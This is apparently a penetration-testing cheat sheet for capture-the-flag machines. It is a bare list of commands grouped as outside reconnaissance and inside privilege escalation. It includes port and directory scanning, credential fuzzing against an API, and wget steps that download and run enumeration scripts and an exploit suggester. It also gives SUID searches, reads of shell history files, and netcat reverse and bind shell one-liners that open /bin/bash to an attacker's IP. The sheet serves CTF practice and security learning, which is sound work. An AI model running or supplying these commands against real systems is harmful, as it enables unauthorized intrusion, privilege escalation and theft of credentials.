ctf flag CTF outside ping ping -c 10 $(target) | tee ping.txt
curl curl --head $(target)
nmap nmap -p- -oA nmap_fast $(target)
nmap -p- -sV -sC -oA nmap_full $(target)
enum4linux enum4linux $(target)
feroxbuster feroxbuster --url http://$(target)/ -o feroxbuster_80.txt -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster gobuster dir --url $(target) --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
autorecon autorecon 10.10.99.99
wfuzz # === fuzz directories
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404 "$URL/FUZZ"
# === fuzz files
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt --hc 404 "$URL/FUZZ"
# === fuzz parameters
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 302,404 "$URL?FUZZ"
# === fuzz users
wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --hc 404,403 "$URL?user=FUZZ"
FFUF GET & POST ffuf -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -X POST -d '{"key":"value"}' -u http://$(target):8081/api/FUZZ -fw 2
inside sudo -l sudo -l
cron cat /etc/crontab
# - check scripts that are executed as root: can you edit them?
# - check PATH: can you create a script that will be executed instead of the intended one?
find find <directory-location> -user <username> -name <file-name>
find <directory-location> -group <group-name> -name <file-name>
find <directory-location> -executable -group <group-name>
linpeas.sh wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum.sh wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
lse.sh wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh
linux exploit suggester 2 wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
python local server python3 -m http.server
scp scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/
spawning shells python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
netcat nc shell ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444
SUID, SGID and Sticky Bits find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
History history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less
links